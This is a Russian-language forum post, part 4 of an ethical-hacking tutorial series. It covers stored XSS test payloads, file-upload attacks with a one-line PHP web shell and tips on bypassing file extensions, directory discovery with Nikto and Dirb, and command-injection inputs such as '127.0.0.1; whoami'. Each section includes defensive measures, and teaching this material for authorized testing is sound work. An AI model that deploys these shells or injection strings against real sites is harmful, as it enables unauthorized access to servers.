HMCoba
Форумчанин
- Регистрация
- 14.06.2025
- Сообщения
- 20
- Реакции
- 26


Продвинутые атаки и анализ окружения

Часть 1 — Введение в этичный хакинг и основы пентеста
Часть 2 — Установка Kali Linux и создание тестовой среды
Часть 3 — Тестирование уязвимостей веб-приложений
Часть 4 — Продвинутые атаки и анализ окружения
Часть 5 — Удалённый доступ и обратные подключения
Часть 6 — Повышение привилегий, поиск SUID и cron-уязвимостей
Часть 7 — Автоматизация атак с помощью Python и работа с Metasploit
Добро пожаловать в четвёртую часть серии.
Если вы читаете эту часть — значит, вы уже установил Kali Linux, создали тестовую среду и начал изучать основы пентеста.
Пришло время копнуть глубже и познакомиться с атаками, которые чаще всего встречаются в реальных веб-приложениях.

- Что такое Stored XSS и как её эксплуатировать.
- Как работают атаки через небезопасную загрузку файлов.
- Использовать инструменты Nikto и Dirb для разведки директорий.
- Проводить Command Injection — внедрение системных команд.

Stored XSS — это уязвимость, при которой вредоносный JavaScript-код сохраняется на сервере (например, в комментариях), а затем отображается другим пользователям.
Пример:
Код:
<script>alert("Ты был взломан!");</script>
Как протестировать:
- Найдите поле для комментариев или профиля.
- Вставьте JavaScript:
Код:<script>alert('XSS');</script>
- Сохраните и проверьте — выполнится ли скрипт при открытии страницы.
Защита:
– Экранировать HTML
– CSP
– Фильтрация ввода/вывода
🗂 File Upload Vulnerabilities
Загрузка вредоносного файла (например, PHP шелл), если сервер неправильно проверяет файлы.
Пример payload:
PHP:
<?php system($_GET["cmd"]); ?>
URL вызова:
Код:
http://victim.site/uploads/shell.php?cmd=whoami
Советы:
– Меняйте расширения: .php, .phtml, .php.jpg
– Проверяйте поведение сервера после загрузки
Защита:
– MIME и расширение
– Хранение вне webroot
– Запрет на выполнение

Nikto — сканер уязвимостей веб-серверов:
Эта утилита анализирует веб-сервер на наличие:
– устаревших версий ПО,
– известных уязвимостей,
– потенциально опасных скриптов и директорий,
– ошибок конфигурации (например, доступ к
/.git
, phpinfo()
, индексам и т.п.).Пример запуска:
Код:
nikto -h http://target.site

-h
указывает целевой сайт.Интерпретация вывода:
Nikto выдаёт список найденных потенциальных проблем.
Например:
Код:
+ OSVDB-3092: /test/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /favicon.ico.
Directory indexing
) и заголовки могут раскрывать информацию о сервере.---
Dirb — инструмент для перебора директорий:
Dirb автоматически подставляет слова из словаря к базовому URL и проверяет, существуют ли такие пути на сервере. Это помогает находить:
– скрытые админ-панели,
– резервные копии (
backup.zip
),– интерфейсы CMS,
– забытые страницы (
/test/
, /old/
и т.п.).Базовый запуск:
Код:
dirb http://target.site
С указанием словаря:
Код:
dirb http://target.site /usr/share/wordlists/dirb/common.txt
Интерпретация вывода:
Dirb отображает найденные пути, например:
Код:
---- Scanning URL: http://target.site/ ----
+ http://target.site/admin/ (CODE:200|SIZE:1546)
+ http://target.site/login.php (CODE:200|SIZE:1320)
— это значит, что директория
/admin/
и файл login.php
существуют и доступны (код ответа 200).
Command Injection — это уязвимость, при которой можно внедрить системные команды в поля ввода.
Пример поля: «Введите IP» — выполняется:
Код:
ping -c 4 127.0.0.1
Теперь попробуйте такие вводы:
Ввод | Что выполнит сервер |
127.0.0.1 | ping -c 4 127.0.0.1 |
127.0.0.1; whoami | ping -c 4 127.0.0.1; whoami |
127.0.0.1 && ls | ping -c 4 127.0.0.1 && ls |
127.0.0.1 | id | ping -c 4 127.0.0.1 | id |
Пояснение:
- ; — разделяет команды
- && — вторая команда после успешной первой
- | — передаёт вывод первой команде
Пошаговая проверка:
- Найдите поле «IP».
- Введите обычный IP: 127.0.0.1
- Убедитесь, что ping срабатывает.
- Введите: 127.0.0.1; whoami
- Если в ответе — имя пользователя или список файлов — уязвимость найдена.
Защита:
– Не использовать shell-функции без нужды
– Экранировать ввод
– Белые списки значений
– API без shell

Поздравляю — теперь вы знакомы с более продвинутыми техниками тестирования: XSS, загрузка файлов, сканирование директорий и Command Injection.
В следующих частях будет ещё мощнее — подключение к скомпрометированной системе, повышение привилегий и многое другое.
Напишите в комментариях, о чём вы хотели бы узнать в пятой части.

-
Чтобы увидеть нужно авторизоваться или зарегистрироваться.
- PayloadAllTheThings (GitHub)
-
Чтобы увидеть нужно авторизоваться или зарегистрироваться.
Если статья оказалась полезной — не забудьте поделиться ею с другими!
Вложения
Последнее редактирование: